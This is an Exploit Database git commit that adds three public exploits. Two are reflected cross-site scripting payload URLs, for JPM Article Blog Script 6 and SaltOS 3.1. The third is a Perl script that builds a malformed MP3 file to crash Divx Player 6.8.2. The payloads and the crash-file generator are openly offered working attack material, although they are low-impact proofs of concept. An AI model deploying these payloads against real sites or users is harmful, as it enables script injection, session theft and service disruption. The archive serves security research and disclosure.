DB: 2015-07-20

3 new exploits
This commit is contained in:
Offensive Security 2015-07-20 05:02:04 +00:00
parent 8762b868bf
commit 47c7b2c110
4 changed files with 38 additions and 0 deletions

View file

@ -33973,3 +33973,6 @@ id,file,description,date,author,platform,type,port
37637,platforms/php/webapps/37637.pl,"Elastix 'graph.php' Local File Include Vulnerability",2012-08-17,cheki,php,webapps,0
37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting Vulnerability",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0
37639,platforms/multiple/dos/37639.html,"Mozilla Firefox Remote Denial of Service Vulnerability",2012-08-17,"Jean Pascal Pereira",multiple,dos,0
37640,platforms/windows/dos/37640.pl,"Divx Player Denial of Service Vulnerability",2012-08-20,Dark-Puzzle,windows,dos,0
37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 'tid' Parameter Cross Site Scripting Vulnerability",2012-08-21,Mr.0c3aN,php,webapps,0
37642,platforms/php/webapps/37642.txt,"SaltOS 'download.php' Cross Site Scripting Vulnerability",2012-08-18,"Stefan Schurtz",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/55112/info
JPM Article Blog Script 6 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/forum/index.php?tid=4â??></title><script>alert(Mr.0c3aN)</script>><marquee><h1>ocean</h1></marquee>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55117/info
SaltOS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
SaltOS 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/SaltOS-3.1/user/lib/phpexcel/PHPExcel/Shared/JAMA/docs/download.php/ â??><script>alert(â??xssâ??)</script>

19
platforms/windows/dos/37640.pl Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/55105/info
Divx Player is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the application to crash, denying service to legitimate users.
Divx 6.8.2 is vulnerable; other versions may also be affected.
# usage : perl divxdOs.pl
my $id="\x55\x46\x49\x44\x20\x55\x6e\x69\x71\x75\x65\x20\x66\x69\x6c\x65\x20\x69\x64\x65\x6e\x74\x69\x66\x69\x65\x72\x0d\x0a\x55\x53\x45\x52\x20\x54\x65\x72\x6d\x73\x20\x6f\x66\x20\x75\x73\x65\x0d\x0a\x55\x53\x4c\x54\x20\x55\x6e\x73\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x64\x20\x6c\x79\x72\x69\x63\x2f\x74\x65\x78\x74\x20\x74\x72\x61\x6e\x73\x63\x72\x69\x70\x74\x69\x6f\x6e";
my $cdat= "\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20\x22\x2c\x23\x1c\x1c\x28\x2b\x78\x29\x2c\x30\x27\x39\x3d\x30\x3c\x2e\x61\x78\x32\xc3\x83\xc2\xbf\xc3\x83\xef\xbf\xbd";
my $file= "dark-puzzle.mp3";
open($FILE,">$file");
print $FILE $id.$cdat;
close($FILE);
print "MP3 File Created , Enjoy !!\n";